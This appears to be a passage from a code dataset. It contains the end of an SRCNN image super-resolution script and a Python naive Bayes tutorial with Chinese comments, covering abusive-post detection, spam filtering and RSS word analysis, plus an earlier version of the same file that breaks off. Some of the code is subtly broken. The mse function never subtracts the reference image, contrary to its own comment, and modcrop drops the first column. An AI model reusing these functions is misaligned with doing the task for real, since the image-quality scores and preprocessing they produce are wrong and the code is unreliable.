/ rmse)\n\n\n#define function for mean Squared error(MSE)\ndef mse(target, ref):\n #mse is the sum pf the squared difference between the two image\n \n err = np.sum((target.astype('float'))** 2)\n err /= float(target.shape[0] *target.shape[1])\n \n return err\n \n#define function that combines all three image quality metrics\ndef compare_images(target, ref):\n scores = []\n scores.append(psnr(target, ref))\n scores.append(mse(target, ref))\n scores.append(ssim(target, ref, multichannel = True))\n \n return scores\n\n#prepare degraded images by introducing quality distortions via resizing\n \ndef prepare_images(path, factor):\n \n #loop throgh filesin the directory\n for file in os.listdir(path):\n \n #open the file\n img = cv2.imread(path +'/' + file)\n \n #find old and new image dimensions\n h, w, c = img.shape\n new_height = h / factor\n new_width = w / factor\n \n #resize the image -down\n img = (cv2.resize(img, (int(new_width), int(new_height)), interpolation = cv2.INTER_LINEAR))\n img = (cv2.resize(img, (int(w), int(h)), interpolation = cv2.INTER_LINEAR))\n \n #save the image\n print('Saving {}'.format(file))\n cv2.imwrite('images//{}'.format(file), img)\n \nprepare_images('source_images/', 2)\n\n#testing the generated images using image quality matrics\n\nfor file in os.listdir('images/'):\n \n #open target and reference images\n target = cv2.imread('images/{}'.format(file))\n ref = cv2.imread('source_images/{}'.format(file))\n \n #calculate the scores\n scores = compare_images(target, ref)\n \n #print all three scores\n print('{}\\nPSNR: {}\\nMSE: {}\\nSSIM: {}\\n'.format(file, scores[0], scores[1], scores[2]))\n \n#define the SRCNN model\n \ndef model():\n #define the model type\n SRCNN = Sequential()\n \n #add model layers\n SRCNN.add(Conv2D(filters = 128, kernel_size = (9,9), activation ='relu', padding = 'valid', use_bias = True, input_shape = (None, None, 1)))\n SRCNN.add(Conv2D(filters = 64, kernel_size = (3,3), activation ='relu', padding = 'same', 
use_bias = True ))\n SRCNN.add(Conv2D(filters = 1, kernel_size = (5,5), activation ='linear', padding = 'valid', use_bias = True))\n\n #define optimizer\n adam = Adam(learning_rate = 0.0003)\n #compile model\n SRCNN.compile(loss ='mean_squared_error', optimizer = adam, metrics =['mean_squared_error'])\n \n return SRCNN\n\n\n#define necessary image processing functions\ndef modcrop(img, scale):\n \n tmpsz = img.shape\n sz= tmpsz[0:2]\n sz = sz - np.mod(sz, scale)\n img = img[0:sz[0], 1:sz[1]]\n return img\n\n\ndef shave(image, border):\n img = image[border: -border, border: -border]\n return img\n\n#define main prediction function\ndef predict(image_path):\n \n #load the srcnn model with weights\n srcnn =model()\n srcnn.load_weights('3051crop_weight_200.h5')\n \n #load the degraded and reference images\n path, file =os.path.split(image_path)\n degraded = cv2.imread(image_path)\n ref = cv2.imread('source_images/{}'.format(file))\n \n #preprocess the image with modcrop\n ref = modcrop(ref, 3)\n degraded = modcrop(degraded, 3)\n \n #convert the image to YCrCb -srcnn trained on Y channel\n temp =cv2.cvtColor(degraded, cv2.COLOR_BGR2YCrCb)\n \n #create image slice and normalize\n Y = np.zeros((1, temp.shape[0], temp.shape[1], 1), dtype = float)\n Y[0, :, :, 0] = temp[:, :, 0].astype(float)/ 255\n \n #perform super resolution with srcnn\n pre = srcnn.predict(Y, batch_size = 1)\n \n #post process the output\n pre*= 255\n pre[pre[:] > 255] = 255\n pre[pre[:] < 0] = 0\n pre = pre.astype(np.uint8)\n \n #copy Y channel back to image and convert to BGR\n temp = shave(temp, 6)\n temp[:, :, 0] = pre[0, :, :, 0]\n output = cv2.cvtColor(temp, cv2.COLOR_YCrCb2BGR)\n \n #remove border from reference and degraded image\n ref = shave(ref.astype(np.uint8), 6)\n degraded = shave(degraded.astype(np.uint8), 6)\n \n #image quality calculations\n scores = []\n scores.append(compare_images(degraded, ref))\n scores.append(compare_images(output, ref))\n \n #return images and scores\n return 
ref, degraded, output, scores\n \n \n \nref, degraded, output, scores = predict('images/flowers.bmp')\n\n#print all score for all images\nprint('Degraded Image: \\nPSNR: {}\\nMSE: {}\\nSSIM: {}\\n'.format(scores[0][0], scores[0][1], scores[0][2]))\nprint('Reconstructed Image: \\nPSNR: {}\\nMSE: {}\\nSSIM: {}\\n'.format(scores[1][0], scores[1][1], scores[1][2]))\n\n#display images as subplots\nfig, axs = plt.subplots(1, 3, figsize = (20, 8))\naxs[0].imshow(cv2.cvtColor(ref, cv2.COLOR_BGR2RGB))\naxs[0].set_title('Original')\naxs[1].imshow(cv2.cvtColor(degraded, cv2.COLOR_BGR2RGB))\naxs[1].set_title('Degraded')\naxs[2].imshow(cv2.cvtColor(output, cv2.COLOR_BGR2RGB))\naxs[2].set_title('SRCNN')\n\n\n#remove the x and y tick marks\nfor ax in axs:\n ax.set_xticks([])\n ax.set_yticks([])",
"step-ids": [
3,
7,
9,
10,
12
]
}
|
[
3,
7,
9,
10,
12
] |
# coding=utf-8
from numpy import *
""" 1
函数loadDataSet()创建了一些实验样本。 该函数返回的第一个变量是进行词条切分后的文档集合, 这些文档来自斑点犬爱好者留言
板。 这些留言文本被切分成一系列的词条集合, 标点符号从文本中去掉,
loadDataSet( )函数返回的第二个
变量是一个类别标签的集合。 这里有两类, 侮辱性和非侮辱性。 这些文本的类别由人工标注, 这些标注信息用于训练程序以便自动检测侮辱性留言
"""
def loadDataSet():
    """Return the sample corpus for the classifier.

    Returns:
        (postingList, classVec): tokenized message-board posts and their
        labels, where 1 marks an abusive post and 0 a normal one.
    """
    postingList = [
        'my dog has flea problems help please'.split(),
        'maybe not take him to dog park stupid'.split(),
        'my dalmation is so cute I love him'.split(),
        'stop posting stupid worthless garbage'.split(),
        'mr licks ate my steak how to stop him'.split(),
        'quit buying worthless dog food stupid'.split(),
    ]
    classVec = [0, 1, 0, 1, 0, 1]  # 1 is abusive, 0 not
    return postingList, classVec
""" 2
函数createVocabList()会创建一个包含在所有文档中出现的不重复词的列表, 为此使用了Python的set数据类型。 将词条列表输给
set构造函数, set就会返回一个不重复词表。 首先, 创建一个空集合❶, 然后将每篇文档返回的新词集合添加到该集合中❷。 操作符|用于
求两个集合的并集, 这也是一个按位或(OR) 操作符在数学符号表示上, 按位或操作与集合求并操作使用相同记号
"""
def createVocabList(dataSet):
    """Return a list of the unique words appearing across all documents."""
    vocab = set()
    for doc in dataSet:
        # accumulate the union of every document's word set
        vocab.update(doc)
    return list(vocab)
""" 3
获得词汇表后, 便可以使用函数setOfWords2Vec(), 该函数的输入参数为词汇表及某个文档, 输出的是文档向量, 向量的每一元素为1或0,
分别表示词汇表中的单词在输入文档中是否出现。 函数首先创建一个和词汇表等长的向量, 并将其元素都设置为0❸。 接着, 遍历文档中的所有单词,
如果出现了词汇表中的单词, 则将输出的文档向量中的对应值
设为1。 一切都顺利的话, 就不需要检查某个词是否还在vocabList中, 后边可能会用到这一操作
"""
def setOfWords2Vec(vocabList, inputSet):
    """Return a 0/1 occurrence vector over `vocabList`.

    Element i is 1 when vocabList[i] appears anywhere in inputSet, else 0.
    Words in inputSet that are not in the vocabulary are ignored.
    """
    present = set(inputSet)
    return [1 if word in present else 0 for word in vocabList]
"""
先看看前三个函数的执行效果
"""
def test1():
    """Smoke-test the corpus helpers: build the vocabulary for the sample
    posts, print it, and vectorize the first post."""
    listPosts, listClass = loadDataSet()
    mVocabList = createVocabList(listPosts)
    # Fixed: Python-2-only `print mVocabList` statement; the call form
    # prints identically and is valid in both Python 2 and 3.
    print(mVocabList)
    setOfWords2Vec(mVocabList, listPosts[0])
# test1()
# ---------------------------训练算法: 从词向量计算概率--------------------------
"""
函数中的输入参数为文档矩阵trainMatrix, 以及由每篇文档类别标签所构成的向量trainCategory。 首先, 计算文档属于侮辱性文档
(class=1) 的概率, 即P(1)。 因为这是一个二类分类问题, 所以可以通过1-P(1)得到P(0)。 对于多于两类的分类问题, 则需要对代码稍加
修改。计算p(wi|c1) 和p(wi|c0), 需要初始化程序中的分子变量和分母变量❶。 由于w中元素如此众多, 因此可以使用NumPy数组快速计算这些
值。 上述程序中的分母变量是一个元素个数等于词汇表大小的NumPy数组。 在for循环中, 要遍历训练集trainMatrix中的所有文档。 一旦某
个词语(侮辱性或正常词语) 在某一文档中出现, 则该词对应的个数(p1Num或者p0Num) 就加1, 而且在所有的文档中, 该文档的总词数也
相应加1❷。 对于两个类别都要进行同样的计算处理。最后, 对每个元素除以该类别中的总词数❸。 利用NumPy可以很好实现,
用一个数组除以浮点数即可, 若使用常规的Python列表则难以完成这种任务, 读者可以自己尝试一下。 最后, 函数会返回两个向量和一个概率。
"""
def trainNB0(trainMatrix, trainCategory):
    """Train the naive-Bayes model from a document-term matrix.

    trainMatrix   -- one word-count/indicator vector per document
    trainCategory -- class label (0 or 1) per document
    Returns (p0Vect, p1Vect, pAbusive): log word-probabilities for each class
    and the prior probability of class 1.
    """
    numDocs = len(trainMatrix)
    numWords = len(trainMatrix[0])
    pAbusive = sum(trainCategory) / float(numDocs)
    # Laplace smoothing: start every word count at 1 and each denominator at 2
    # so that an unseen word never forces the whole product to zero.
    p0Num, p1Num = ones(numWords), ones(numWords)
    p0Denom, p1Denom = 2.0, 2.0
    for docVec, label in zip(trainMatrix, trainCategory):
        if label == 1:
            p1Num += docVec
            p1Denom += sum(docVec)
        else:
            p0Num += docVec
            p0Denom += sum(docVec)
    # Log-probabilities avoid underflow when many small factors are multiplied.
    return log(p0Num / p0Denom), log(p1Num / p1Denom), pAbusive
def test2():
    """Train on the sample posts and print the prior probability of the abusive class."""
    listPosts, listClass = loadDataSet()
    # build a list containing every unique word across the posts
    mVocabList = createVocabList(listPosts)
    setOfWords2Vec(mVocabList, listPosts[0])
    trainMat = []
    for postinDoc in listPosts:
        temp = setOfWords2Vec(mVocabList, postinDoc)
        trainMat.append(temp)
    # pAb: probability that a document belongs to the abusive class (1)
    p0v, p1v, pAb = trainNB0(trainMat, listClass)
    # print() call (not the Python 2 print statement) so this helper also runs
    # under Python 3, consistent with the print calls used elsewhere in the file
    print(pAb)
"""
接下来看一看在给定文档类别条件下词汇表中单词的出现概率, 看看是否正确。 词汇表中的第一个词是cute, 其在类别0中出现1次, 而在类别1中
从未出现。 对应的条件概率分别为0.041 666 67与0.0。 该计算是正确的。 我们找找所有概率中的最大值, 该值出现在P(1)数组第26个下标位
置, 大小为0.157 894 74。 在myVocabList的第26个下标位置上可以查到该单词是stupid。 这意味着stupid是最能表征类别1(侮辱性文档类)的单词。
"""
"""
代码有4个输入: 要分类的向量vec2Classify以及使用函数trainNB0()计算得到的三个概率。 使用NumPy的数组来计算两个
向量相乘的结果❶。 这里的相乘是指对应元素相乘, 即先将两个向量中的第1个元素相乘, 然后将第2个元素相乘, 以此类推。 接下来将词汇表
中所有词的对应值相加, 然后将该值加到类别的对数概率上。 最后, 比较类别的概率返回大概率对应的类别标签。 这一切不是很难, 对吧?
"""
def classifyNB(vec2Classify, p0Vec, p1Vec, pClass1):
    """Return the class (0 or 1) with the larger log-posterior for vec2Classify.

    vec2Classify -- word vector of the document to classify (numpy array)
    p0Vec, p1Vec -- per-word log-probabilities from trainNB0
    pClass1      -- prior probability of class 1
    """
    # element-wise product selects the log-probabilities of the present words;
    # adding the log prior completes the (log of the) naive-Bayes posterior
    logPosterior1 = log(pClass1) + sum(vec2Classify * p1Vec)
    logPosterior0 = log(1.0 - pClass1) + sum(vec2Classify * p0Vec)
    return 1 if logPosterior1 > logPosterior0 else 0
"""
对文本做一些修改, 看看分类器会输出什么结果。 这个例子非常简单,但是它展示了朴素贝叶斯分类器的工作原理。
接下来,我们会对代码做些修改, 使分类器工作得更好。
函数setOfWords2Vec()稍加修改, 修改后的函数称为bagOfWords2Vec()
-----------------------------------准备数据: 文档词袋模型---------------------------------------
"""
def bagOfWords2VecMN(vocabList, inputSet):
    """Bag-of-words vector: counts occurrences (not mere presence) of each vocab word."""
    # map each word to the position of its first occurrence in vocabList,
    # matching list.index() semantics without a linear scan per token
    first_pos = {}
    for idx, word in enumerate(vocabList):
        first_pos.setdefault(word, idx)
    counts = [0] * len(vocabList)
    for token in inputSet:
        if token in first_pos:
            counts[first_pos[token]] += 1
    return counts
"""
函数是一个便利函数(convenience function) , 该函数封装所有操作, 以节省输入
"""
def testingNB():
    """Convenience driver: train on the sample posts, then classify two test entries."""
    posts, labels = loadDataSet()
    vocab = createVocabList(posts)
    trainMat = [setOfWords2Vec(vocab, doc) for doc in posts]
    p0V, p1V, pAb = trainNB0(array(trainMat), array(labels))
    # classify and report both test entries with the trained model
    for testEntry in (['love', 'my', 'dalmation'], ['stupid', 'garbage']):
        thisDoc = array(setOfWords2Vec(vocab, testEntry))
        print (testEntry,'classified as: ',classifyNB(thisDoc,p0V,p1V,pAb))
# testingNB()
# -----------------------------------使用朴素贝叶斯过滤垃圾邮件----------------------------
"""
准备数据: 切分文本
可以看到, 切分的结果不错, 但是标点符号也被当成了词的一部分。 可以使用正则表示式来切分句子, 其中分隔符是除单词、 数字外的任意字符串
"""
def textParse(bigString):
    """Split a raw string into lowercase tokens, dropping tokens of length <= 2.

    Splitting on non-word characters removes punctuation; the length filter
    discards short words ('is', 'a', ...) and empty split fragments.
    """
    import re
    # \W+ (one or more), not \W* — a pattern that can match the empty string
    # makes re.split break between every character on modern Python, so the
    # original \W* produced no token longer than one character.
    listOfTokens = re.split(r'\W+', bigString)
    return [tok.lower() for tok in listOfTokens if len(tok) > 2]
""""
函数spamTest()对贝叶斯垃圾邮件分类器进行自动化处理。 导入文件夹spam与ham下的文本文件, 并将它们解析为词列表❶。 接下来
构建一个测试集与一个训练集, 两个集合中的邮件都是随机选出的。 本例中共有50封电子邮件, 并不是很多, 其中的10封电子邮件被随机选择
为测试集。 分类器所需要的概率计算只利用训练集中的文档来完成。Python变量trainingSet是一个整数列表, 其中的值从0到49。 接下
来, 随机选择其中10个文件❷。 选择出的数字所对应的文档被添加到测试集, 同时也将其从训练集中剔除。 这种随机选择数据的一部分作为训
练集, 而剩余部分作为测试集的过程称为留存交叉验证(hold-out crossvalidation) 。 假定现在只完成了一次迭代, 那么为了更精确地估计分类
器的错误率, 就应该进行多次迭代后求出平均错误率。接下来的for循环遍历训练集的所有文档, 对每封邮件基于词汇表并使
用setOfWords2Vec()函数来构建词向量。 这些词在traindNB0()函数中用于计算分类所需的概率。 然后遍历测试集, 对其中每封电子邮件进
行分类❸。 如果邮件分类错误, 则错误数加1, 最后给出总的错误百分比
"""
def spamTest():
    """Hold-out cross-validation of the spam classifier over email/spam and email/ham.

    Loads 25 spam and 25 ham messages, randomly reserves 10 of the 50 as a
    test set, trains on the remainder, and prints the resulting error rate.
    """
    docList = []; classList = []; fullText = []
    for i in range(1, 26):
        wordList = textParse(open('email/spam/%d.txt' % i).read())
        docList.append(wordList)
        fullText.extend(wordList)
        classList.append(1)
        wordList = textParse(open('email/ham/%d.txt' % i).read())
        docList.append(wordList)
        fullText.extend(wordList)
        classList.append(0)
    vocabList = createVocabList(docList)  # create vocabulary
    # list(...) is required: a Python 3 range object is immutable, so the
    # original `range(50)` made the `del` below raise TypeError
    trainingSet = list(range(50)); testSet = []
    # randomly build the held-out test set (hold-out cross-validation)
    for i in range(10):
        randIndex = int(random.uniform(0, len(trainingSet)))
        testSet.append(trainingSet[randIndex])
        del(trainingSet[randIndex])
    trainMat = []; trainClasses = []
    for docIndex in trainingSet:  # train the classifier (get probs) trainNB0
        trainMat.append(bagOfWords2VecMN(vocabList, docList[docIndex]))
        trainClasses.append(classList[docIndex])
    p0V, p1V, pSpam = trainNB0(array(trainMat), array(trainClasses))
    errorCount = 0
    for docIndex in testSet:  # classify the remaining items
        wordVector = bagOfWords2VecMN(vocabList, docList[docIndex])
        if classifyNB(array(wordVector), p0V, p1V, pSpam) != classList[docIndex]:
            errorCount += 1
            print ("classification error", docList[docIndex])
    print ('the error rate is: ', float(errorCount)/len(testSet))
    #return vocabList,fullText
#return vocabList,fullText
# ------------------------ Automated run ----------------------------------------
# NOTE(review): this executes the full spam-classification experiment at import
# time; a `if __name__ == '__main__':` guard would make the module importable
# without side effects — confirm whether import-time execution is intended.
spamTest()
# ----------------------------- 4.7. 示例: 使用朴素贝叶斯分类器从个人广告中获取区域倾向---------------------------
""""
RSS源分类器及高频词去除函数
函数calcMostFreq() ❶。 该函数遍历词汇表中的每个词并统计它在文本中出现的次数, 然后根据出现次数从高到低对词典进行排序,
最后返回排序最高的30个单词。 你很快就会明白这个函数的重要性
以下四行) 计算出现频率
"""
def calcMostFreq(vocabList, fullText):
    """Return up to 30 (word, count) pairs for the most frequent vocabulary words.

    Counts each vocabulary word's occurrences in fullText and sorts the pairs
    by count, highest first.
    """
    import operator
    freqDict = {}
    for token in vocabList:
        freqDict[token] = fullText.count(token)
    # dict.iteritems() is Python 2 only; items() works on Python 3 as well,
    # matching the py3-style print calls used elsewhere in this module
    sortedFreq = sorted(freqDict.items(), key=operator.itemgetter(1), reverse=True)
    return sortedFreq[:30]
""""
函数localWords()使用两个RSS源作为参数。 RSS源要在函数外
导入, 这样做的原因是RSS源会随时间而改变。 如果想通过改变代码来
比较程序执行的差异, 就应该使用相同的输入。 重新加载RSS源就会得
到新的数据, 但很难确定是代码原因还是输入原因导致输出结果的改
变。 函数localWords()与程序清单4-5中的spamTest()函数几乎相
同, 区别在于这里访问的是RSS源❷而不是文件。 然后调用函
数calcMostFreq()来获得排序最高的30个单词并随后将它们移除❸。
函数的剩余部分与spamTest()基本类似, 不同的是最后一行要返回下
面要用到的值。
"""
def localWords(feed1, feed0):
    """Train/evaluate the classifier on two parsed RSS feeds.

    feed1 entries are labelled class 1, feed0 entries class 0. The 30 most
    frequent words are removed from the vocabulary, 20 random entries are
    held out for testing, the error rate is printed, and
    (vocabList, p0V, p1V) is returned for getTopWords().
    """
    import feedparser
    docList = []; classList = []; fullText = []
    minLen = min(len(feed1['entries']), len(feed0['entries']))
    for i in range(minLen):
        # one RSS entry per iteration from each feed
        wordList = textParse(feed1['entries'][i]['summary'])
        docList.append(wordList)
        fullText.extend(wordList)
        classList.append(1)  # NY is class 1
        wordList = textParse(feed0['entries'][i]['summary'])
        docList.append(wordList)
        fullText.extend(wordList)
        classList.append(0)
    vocabList = createVocabList(docList)  # create vocabulary
    top30Words = calcMostFreq(vocabList, fullText)  # remove top 30 words
    for pairW in top30Words:
        if pairW[0] in vocabList: vocabList.remove(pairW[0])
    # list(...) is required: a Python 3 range object is immutable, so the
    # original `range(2*minLen)` made the `del` below raise TypeError
    trainingSet = list(range(2 * minLen)); testSet = []
    for i in range(20):
        randIndex = int(random.uniform(0, len(trainingSet)))
        testSet.append(trainingSet[randIndex])
        del(trainingSet[randIndex])
    trainMat = []; trainClasses = []
    for docIndex in trainingSet:  # train the classifier (get probs) trainNB0
        trainMat.append(bagOfWords2VecMN(vocabList, docList[docIndex]))
        trainClasses.append(classList[docIndex])
    p0V, p1V, pSpam = trainNB0(array(trainMat), array(trainClasses))
    errorCount = 0
    for docIndex in testSet:  # classify the remaining items
        wordVector = bagOfWords2VecMN(vocabList, docList[docIndex])
        if classifyNB(array(wordVector), p0V, p1V, pSpam) != classList[docIndex]:
            errorCount += 1
    print ('the error rate is: ', float(errorCount)/len(testSet))
    return vocabList, p0V, p1V
def getTopWords(ny, sf):
    """Train via localWords(ny, sf) and print, per class, every token whose
    log-probability exceeds -6.0, sorted most-probable first."""
    vocabList, p0V, p1V = localWords(ny, sf)
    topNY = []
    topSF = []
    # collect (word, log-prob) pairs above the -6.0 threshold for each class
    for word, lp0, lp1 in zip(vocabList, p0V, p1V):
        if lp0 > -6.0:
            topSF.append((word, lp0))
        if lp1 > -6.0:
            topNY.append((word, lp1))
    banners = (
        ("SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**", topSF),
        ("NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**", topNY),
    )
    for banner, pairs in banners:
        print (banner)
        for word, _ in sorted(pairs, key=lambda pair: pair[1], reverse=True):
            print (word)
|
normal
|
{
"blob_id": "1a166a08c835caa8dd308d59227051751aff7c0f",
"index": 9059,
"step-1": "\n# coding=utf-8\n\nfrom numpy import *\n\n\"\"\" 1\n函数loadDataSet()创建了一些实验样本。 该函数返回的第一个变量是进行词条切分后的文档集合, 这些文档来自斑点犬爱好者留言\n板。 这些留言文本被切分成一系列的词条集合, 标点符号从文本中去掉, \nloadDataSet( )函数返回的第二个\n变量是一个类别标签的集合。 这里有两类, 侮辱性和非侮辱性。 这些文本的类别由人工标注, 这些标注信息用于训练程序以便自动检测侮辱性留言\n\"\"\"\ndef loadDataSet():\n postingList=[['my', 'dog', 'has', 'flea', 'problems', 'help', 'please'],\n ['maybe', 'not', 'take', 'him', 'to', 'dog', 'park', 'stupid'],\n ['my', 'dalmation', 'is', 'so', 'cute', 'I', 'love', 'him'],\n ['stop', 'posting', 'stupid', 'worthless', 'garbage'],\n ['mr', 'licks', 'ate', 'my', 'steak', 'how', 'to', 'stop', 'him'],\n ['quit', 'buying', 'worthless', 'dog', 'food', 'stupid']]\n classVec = [0,1,0,1,0,1] #1 is abusive, 0 not\n return postingList,classVec\n\n\"\"\" 2 \n函数createVocabList()会创建一个包含在所有文档中出现的不重复词的列表, 为此使用了Python的set数据类型。 将词条列表输给\nset构造函数, set就会返回一个不重复词表。 首先, 创建一个空集合❶, 然后将每篇文档返回的新词集合添加到该集合中❷。 操作符|用于\n求两个集合的并集, 这也是一个按位或(OR) 操作符在数学符号表示上, 按位或操作与集合求并操作使用相同记号\n\"\"\"\ndef createVocabList(dataSet):\n vocabSet = set([]) #create empty set\n for document in dataSet:\n vocabSet = vocabSet | set(document) #union of the two sets\n return list(vocabSet)\n\n\"\"\" 3 \n获得词汇表后, 便可以使用函数setOfWords2Vec(), 该函数的输入参数为词汇表及某个文档, 输出的是文档向量, 向量的每一元素为1或0,\n分别表示词汇表中的单词在输入文档中是否出现。 函数首先创建一个和词汇表等长的向量, 并将其元素都设置为0❸。 接着, 遍历文档中的所有单词,\n 如果出现了词汇表中的单词, 则将输出的文档向量中的对应值\n设为1。 一切都顺利的话, 就不需要检查某个词是否还在vocabList中, 后边可能会用到这一操作\n\"\"\"\ndef setOfWords2Vec(vocabList, inputSet):\n returnVec = [0]*len(vocabList)\n for word in inputSet:\n if word in vocabList:\n returnVec[vocabList.index(word)] = 1\n return returnVec\n\n\"\"\"\n先看看前三个函数的执行效果\n\"\"\"\n\ndef test1():\n listPosts, listClass = loadDataSet()\n mVocabList = createVocabList(listPosts)\n print mVocabList\n setOfWords2Vec(mVocabList, listPosts[0])\n\n# test1()\n\n\n# ---------------------------训练算法: 从词向量计算概率--------------------------\n\n\"\"\"\n函数中的输入参数为文档矩阵trainMatrix, 以及由每篇文档类别标签所构成的向量trainCategory。 首先, 计算文档属于侮辱性文档\n(class=1) 的概率, 即P(1)。 因为这是一个二类分类问题, 
所以可以通过1-P(1)得到P(0)。 对于多于两类的分类问题, 则需要对代码稍加\n修改。计算p(wi|c1) 和p(wi|c0), 需要初始化程序中的分子变量和分母变量❶。 由于w中元素如此众多, 因此可以使用NumPy数组快速计算这些\n值。 上述程序中的分母变量是一个元素个数等于词汇表大小的NumPy数组。 在for循环中, 要遍历训练集trainMatrix中的所有文档。 一旦某\n个词语(侮辱性或正常词语) 在某一文档中出现, 则该词对应的个数(p1Num或者p0Num) 就加1, 而且在所有的文档中, 该文档的总词数也\n相应加1❷。 对于两个类别都要进行同样的计算处理。最后, 对每个元素除以该类别中的总词数❸。 利用NumPy可以很好实现, \n用一个数组除以浮点数即可, 若使用常规的Python列表则难以完成这种任务, 读者可以自己尝试一下。 最后, 函数会返回两个向量和一个概率。\n\"\"\"\ndef trainNB0(trainMatrix,trainCategory):\n numTrainDocs = len(trainMatrix)\n numWords = len(trainMatrix[0])\n pAbusive = sum(trainCategory)/float(numTrainDocs)\n # 1. (以下两行) 初始化概率\n \"\"\"\n 利用贝叶斯分类器对文档进行分类时, 要计算多个概率的乘积以获得文档属于某个类别的概率, 即计算p(w0|1)p(w1|1)p(w2|1)。 如果其中一\n 个概率值为0, 那么最后的乘积也为0。 为降低这种影响, 可以将所有词的出现数初始化为1, 并将分母初始化为2\n \"\"\"\n p0Num = ones(numWords); p1Num = ones(numWords) # change to ones()\n p0Denom = 2.0; p1Denom = 2.0 # change to 2.0\n for i in range(numTrainDocs):\n if trainCategory[i] == 1:\n # 2. (以下两行) 向量相加\n p1Num += trainMatrix[i]\n p1Denom += sum(trainMatrix[i])\n else:\n p0Num += trainMatrix[i]\n p0Denom += sum(trainMatrix[i])\n # 3. 
对每个元素做除法\n \"\"\"\n 另一个遇到的问题是下溢出, 这是由于太多很小的数相乘造成的。 当计算乘积p(w0|ci)p(w1|ci)p(w2|ci)...p(wN|ci)时, 由于大部分因子都\n 非常小, 所以程序会下溢出或者得到不正确的答案。 (读者可以用Python尝试相乘许多很小的数, 最后四舍五入后会得到0。 ) 一种解决\n 办法是对乘积取自然对数。 在代数中有ln(a*b) = ln(a)+ln(b), 于是通过求对数可以避免下溢出或者浮点数舍入导致的错误。 同时, 采用\n 自然对数进行处理不会有任何损失。 图4-4给出函数f(x)与ln(f(x))的曲线。 检查这两条曲线, 就会发现它们在相同区域内同时增加或者减\n 少, 并且在相同点上取到极值。 它们的取值虽然不同, 但不影响最终结果。 通过修改return前的两行代码, 将上述做法用到分类器中:\n \"\"\"\n p1Vect = log(p1Num/p1Denom) # change to log()\n p0Vect = log(p0Num/p0Denom) # change to log()\n return p0Vect,p1Vect,pAbusive\n\n\ndef test2():\n listPosts, listClass = loadDataSet()\n # 构建了一个包含所有词的列表mVocabList\n mVocabList = createVocabList(listPosts)\n setOfWords2Vec(mVocabList, listPosts[0])\n trainMat = []\n for postinDoc in listPosts:\n temp = setOfWords2Vec(mVocabList, postinDoc)\n trainMat.append(temp)\n # 文档属于侮辱类的概率pAb\n p0v, p1v, pAb = trainNB0(trainMat, listClass)\n print pAb\n\n\"\"\"\n接下来看一看在给定文档类别条件下词汇表中单词的出现概率, 看看是否正确。 词汇表中的第一个词是cute, 其在类别0中出现1次, 而在类别1中\n从未出现。 对应的条件概率分别为0.041 666 67与0.0。 该计算是正确的。 我们找找所有概率中的最大值, 该值出现在P(1)数组第26个下标位\n置, 大小为0.157 894 74。 在myVocabList的第26个下标位置上可以查到该单词是stupid。 这意味着stupid是最能表征类别1(侮辱性文档类)的单词。\n\"\"\"\n\n\n\"\"\"\n代码有4个输入: 要分类的向量vec2Classify以及使用函数trainNB0()计算得到的三个概率。 使用NumPy的数组来计算两个\n向量相乘的结果❶。 这里的相乘是指对应元素相乘, 即先将两个向量中的第1个元素相乘, 然后将第2个元素相乘, 以此类推。 接下来将词汇表\n中所有词的对应值相加, 然后将该值加到类别的对数概率上。 最后, 比较类别的概率返回大概率对应的类别标签。 这一切不是很难, 对吧?\n\"\"\"\ndef classifyNB(vec2Classify, p0Vec, p1Vec, pClass1):\n # 1. 
元素相乘 分类计算的核心\n p1 = sum(vec2Classify * p1Vec) + log(pClass1) # element-wise mult\n p0 = sum(vec2Classify * p0Vec) + log(1.0 - pClass1)\n if p1 > p0:\n return 1\n else: \n return 0\n\n\n\"\"\"\n对文本做一些修改, 看看分类器会输出什么结果。 这个例子非常简单,但是它展示了朴素贝叶斯分类器的工作原理。\n 接下来,我们会对代码做些修改, 使分类器工作得更好。\n 函数setOfWords2Vec()稍加修改, 修改后的函数称为bagOfWords2Vec()\n -----------------------------------准备数据: 文档词袋模型---------------------------------------\n\"\"\"\n\n\ndef bagOfWords2VecMN(vocabList, inputSet):\n returnVec = [0]*len(vocabList)\n for word in inputSet:\n if word in vocabList:\n # todo 这个词的操作\n returnVec[vocabList.index(word)] += 1\n return returnVec\n\n\n\"\"\"\n函数是一个便利函数(convenience function) , 该函数封装所有操作, 以节省输入\n\"\"\"\n\n\ndef testingNB():\n listOPosts,listClasses = loadDataSet()\n myVocabList = createVocabList(listOPosts)\n trainMat=[]\n for postinDoc in listOPosts:\n trainMat.append(setOfWords2Vec(myVocabList, postinDoc))\n p0V,p1V,pAb = trainNB0(array(trainMat),array(listClasses))\n testEntry = ['love', 'my', 'dalmation']\n thisDoc = array(setOfWords2Vec(myVocabList, testEntry))\n print (testEntry,'classified as: ',classifyNB(thisDoc,p0V,p1V,pAb))\n testEntry = ['stupid', 'garbage']\n thisDoc = array(setOfWords2Vec(myVocabList, testEntry))\n print (testEntry,'classified as: ',classifyNB(thisDoc,p0V,p1V,pAb))\n\n\n# testingNB()\n\n# -----------------------------------使用朴素贝叶斯过滤垃圾邮件----------------------------\n\n\"\"\"\n准备数据: 切分文本\n可以看到, 切分的结果不错, 但是标点符号也被当成了词的一部分。 可以使用正则表示式来切分句子, 其中分隔符是除单词、 数字外的任意字符串\n\"\"\"\ndef textParse(bigString): #input is big string, #output is word list\n import re\n listOfTokens = re.split(r'\\W*', bigString)\n return [tok.lower() for tok in listOfTokens if len(tok) > 2] \n\n\"\"\"\"\n函数spamTest()对贝叶斯垃圾邮件分类器进行自动化处理。 导入文件夹spam与ham下的文本文件, 并将它们解析为词列表❶。 接下来\n构建一个测试集与一个训练集, 两个集合中的邮件都是随机选出的。 本例中共有50封电子邮件, 并不是很多, 其中的10封电子邮件被随机选择\n为测试集。 分类器所需要的概率计算只利用训练集中的文档来完成。Python变量trainingSet是一个整数列表, 其中的值从0到49。 接下\n来, 随机选择其中10个文件❷。 选择出的数字所对应的文档被添加到测试集, 同时也将其从训练集中剔除。 这种随机选择数据的一部分作为训\n练集, 
